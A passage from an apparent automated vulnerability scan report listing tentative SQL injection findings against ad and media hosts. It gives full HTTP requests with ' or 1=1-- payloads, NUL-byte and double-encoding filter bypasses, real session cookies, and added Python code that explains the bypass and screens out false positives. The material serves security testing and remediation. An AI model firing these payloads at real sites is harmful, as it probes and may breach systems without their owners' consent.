NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) or input filter written in native code, where strings are NUL-terminated: the filter stops reading at the decoded %00 and never sees the characters after it, while the application runtime, which tracks string length, receives the whole value. Fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. A filter should also reject a NUL anywhere in a URL path outright, since no legitimate request contains one.
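The mechanism described in the remediation note, as an added Python example (not code from the report, from the scanner, or from either site): ctypes.c_char_p reads a buffer the way C's strlen()/strstr() do, so a filter built on it stops at the decoded %00 while the application's length-counted string still carries the quote. The token list is an assumption for the example; the real filter rules in front of amch.questionmarket.com, if any, are unknown, and nothing on the page confirms that such a filter exists there.

```python
import ctypes
from urllib.parse import unquote

# Tokens a simple signature filter might reject. Assumed for the example; the
# real filter rules (if any) in front of amch.questionmarket.com are unknown.
BLOCKED_TOKENS = ("'", "--", " or ", " and ")


def decode_path(raw_path):
    """Percent-decode the request path as the application would; %00 becomes a real NUL."""
    return unquote(raw_path)


def c_string_view(text):
    """What NUL-terminated native code sees. ctypes.c_char_p reads the buffer up to the
    first NUL, exactly as strlen()/strstr() would, so everything after %00 vanishes."""
    buf = text.encode("utf-8")
    return ctypes.c_char_p(buf).value.decode("utf-8")


def native_filter_blocks(raw_path):
    """A filter that matches signatures against a C string."""
    visible = c_string_view(decode_path(raw_path)).lower()
    return any(tok in visible for tok in BLOCKED_TOKENS)


def hardened_filter_blocks(raw_path):
    """Match against the full length-counted string and reject an embedded NUL outright:
    no legitimate URL path contains one."""
    full = decode_path(raw_path)
    if "\x00" in full:
        return True
    return any(tok in full.lower() for tok in BLOCKED_TOKENS)


def trace(raw_path):
    """Side-by-side view of one request path: what the native filter sees, what the
    application sees, and whether each filter variant would have stopped it."""
    full = decode_path(raw_path)
    return {
        "filter_sees": c_string_view(full),
        "application_sees": full,
        "native_filter_blocks": native_filter_blocks(raw_path),
        "hardened_filter_blocks": hardened_filter_blocks(raw_path),
    }


if __name__ == "__main__":
    # A plain quote probe (the kind a filter would catch), followed by the two
    # NUL-prefixed request paths recorded in issue 1.8.
    for path in ("/adsc'/d775029/8/923517/decide.php",
                 "/adsc%00'/d775029/8/923517/decide.php",
                 "/adsc%00''/d775029/8/923517/decide.php"):
        print(path, trace(path), sep="\n  ")
```

The point of `trace()` is the first two keys: for the %00 path the filter sees `/adsc` and nothing else, while the application string still contains the quote. The hardened variant does not try to be clever about signatures; it refuses the NUL itself, which is the check a WAF written in a length-counted language gets for free.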

Request 1

GET /adsc%00'/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1402


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
</a>
about the error.


</dd>
...[SNIP]...

Request 2

GET /adsc%00''/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc was not found on this server.</p>
<hr>
<address
...[SNIP]...

1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cdn.media.abc.go.com
Path:   /m/images/global/generic/logo.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19952419'%20or%201%3d1--%20 and 19952419'%20or%201%3d2--%20 (a random numeric prefix followed by ' or 1=1-- and ' or 1=2-- , URL-encoded) were each submitted in the REST URL parameter 1. The two requests produced different responses, which the scanner reads as a sign that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, so review the reported requests and responses before accepting the finding. Response 1 is a 302 to http://abc.go.com/error from node abcmed05; Response 2 is a 200 with an empty body from node abcmed06. Different nodes answered the two requests, so the difference may be node behavior rather than query logic. The polarity is also backwards for a boolean-based injection: the always-true payload (1=1) should return the normal resource and the always-false one (1=2) the error, yet here the 1=1 request was sent to the error page and the 1=2 request got a 200. Neither response is the logo image the path names. Treat this as a probable false positive; repeat the pair against a single node and compare both with the untampered request before reporting.
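How a practitioner re-checks this class of finding before believing it, as an added Python example covering issues 1.4 through 1.7 and 1.9 (not code from the XSS.CX report or from Burp Suite): the checker normalizes each response, drops headers that change on their own, strips any echoed payload from the body, and refuses to score a true/false pair that was served by different backend nodes. The sample responses are constructed from the status lines, From:/Server: headers and 404 bodies recorded in issues 1.4 through 1.7; the Apache-style 404 in echoed_payload_verdict is modelled on issue 1.8; the ok/empty pair in genuine_candidate_verdict is hypothetical and shows what a real boolean-based result would look like. Treating the From: header as a backend identifier is an assumption that happens to hold for the hosts on this page.

```python
import re
from collections import namedtuple

# A captured HTTP response reduced to what the comparison needs.
Response = namedtuple("Response", "status headers body")

# Headers that legitimately differ between two otherwise identical responses.
VOLATILE_HEADERS = {"date", "content-length", "server", "from", "x-powered-by",
                    "connection", "vary", "set-cookie", "cache-expires",
                    "last-modified", "cache-control"}


def backend_id(resp):
    """Name of the node that served the response. The hosts in this report label
    their nodes in a From: header (assumption: that header is trustworthy);
    fall back to Server: when it is absent."""
    h = {k.lower(): v for k, v in resp.headers.items()}
    return h.get("from", h.get("server", "?")).lower()


def normalize(resp, payloads=()):
    """Canonical, hashable form of a response: status, the stable headers, and
    the body with whitespace collapsed and any echoed payload removed."""
    body = resp.body
    for p in payloads:
        body = body.replace(p, "")
    body = re.sub(r"\s+", " ", body).strip()
    stable = tuple(sorted((k.lower(), v) for k, v in resp.headers.items()
                          if k.lower() not in VOLATILE_HEADERS))
    return (resp.status, stable, body)


def assess(baseline, true_resps, false_resps, payloads=()):
    """Verdict for one parameter.

    baseline    - response to the untampered request
    true_resps  - responses to the always-true payload (' and 1=1-- ), repeated
    false_resps - responses to the always-false payload (' and 1=2-- ), repeated
    """
    nodes = {backend_id(r) for r in (baseline, *true_resps, *false_resps)}
    if len(nodes) > 1:
        # The situation in issues 1.4-1.7: N7ADWEB05 (IIS/6.0) answered one
        # request and n7adweb02 (IIS/7.5) the other. The diff measures the
        # load balancer, not the database.
        return "MIXED_BACKENDS"
    base = normalize(baseline, payloads)
    t = {normalize(r, payloads) for r in true_resps}
    f = {normalize(r, payloads) for r in false_resps}
    if t & f:
        return "NO_DIFFERENCE"   # true and false looked alike at least once
    if len(t) != 1 or len(f) != 1 or base not in t:
        return "UNSTABLE"        # responses vary on their own, or "true" != baseline
    return "CANDIDATE"           # consistent, same node, true == baseline != false


# Constructed from the header lines and 404 bodies recorded in issues 1.4-1.7.
IIS6_404 = Response(404, {"Server": "Microsoft-IIS/6.0", "From": "N7ADWEB05",
                          "Content-Type": "text/html", "Content-Length": "1635"},
                    "<h1>The page cannot be found</h1> "
                    "<h2>HTTP Error 404 - File or directory not found.</h2>")
IIS75_404 = Response(404, {"Server": "Microsoft-IIS/7.5", "From": "n7adweb02",
                           "Content-Type": "text/html", "Content-Length": "1245"},
                     "<h1>Server Error</h1> <h2>404 - File or directory not found.</h2>")


def report_pair_verdict():
    """Issues 1.4-1.7 exactly as reported: one 404 from each backend node."""
    return assess(IIS6_404, [IIS6_404], [IIS75_404])


def same_node_verdict():
    """The same probes, had every request been answered by N7ADWEB05."""
    return assess(IIS6_404, [IIS6_404, IIS6_404], [IIS6_404, IIS6_404])


def echoed_payload_verdict():
    """An Apache-style 404 that echoes the path (compare issue 1.8): once the
    payloads are stripped from the body, the pair collapses to one fingerprint."""
    p_true, p_false = "' and 1=1-- ", "' and 1=2-- "

    def apache_404(path):
        return Response(404, {"Server": "Apache", "From": "web1"},
                        f"<h1>Not Found</h1><p>The requested URL {path} was not found on this server.</p>")

    return assess(apache_404("/adsc"), [apache_404("/adsc" + p_true)],
                  [apache_404("/adsc" + p_false)], payloads=(p_true, p_false))


def genuine_candidate_verdict():
    """Hypothetical (not observed on this page): what a real boolean-based result
    looks like. The 'true' probe returns the normal resource, the 'false' probe an
    empty one, consistently, and every response comes from a single node."""
    ok = Response(200, {"Content-Type": "image/gif", "From": "node1"}, "GIF89a...")
    empty = Response(200, {"Content-Type": "image/gif", "From": "node1"}, "")
    return assess(ok, [ok, ok, ok], [empty, empty, empty])


if __name__ == "__main__":
    for fn in (report_pair_verdict, same_node_verdict,
               echoed_payload_verdict, genuine_candidate_verdict):
        print(f"{fn.__name__:28s} {fn()}")
```

Three rules do the work: never compare responses from different nodes, require the "true" response to match the untampered baseline (a 1=1 clause should change nothing), and require the result to repeat. The four findings on this host fail the first rule outright; issue 1.9 fails the second even before the node question is settled.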

Request 1

GET /m19952419'%20or%201%3d1--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response 1

HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed05
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:07:39 GMT
Connection: close

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error
">http://abc.go.com/error
</A>.<BODY></HTML>

Request 2

GET /m19952419'%20or%201%3d2--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:07:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed06
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:22:39 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=274
Date: Sat, 17 Sep 2011 01:07:42 GMT
Connection: close


1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The jsv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the jsv request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 5631
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstim
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:46 GMT
Server: cafe
Cache-Control: private
Content-Length: 3910
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 00:56:46 GMT

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The slotname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the slotname parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00'&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:35 GMT
Server: cafe
Cache-Control: private
Content-Length: 4567
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
i = d.indexOf("&");var r = '';if (ei >= 0)r = d.substring(ei, d.length);a.href = c + t + r; } else {a.href += "&clkt=" + t;}}return true;}(function(){var f=function(){var a=-1;try{htet()}catch(b){if(b.stack){var c=b.stack,a=c.split(" at").length-1;a==0&&(a=c.split(")@").length-1);a=a>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00''&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 4052
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 01:00:37 GMT

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...

1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00'&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:20 GMT
Server: cafe
Cache-Control: private
Content-Length: 5987
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerifyTag - DFA -->
<!-- Copyright 2009 D
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

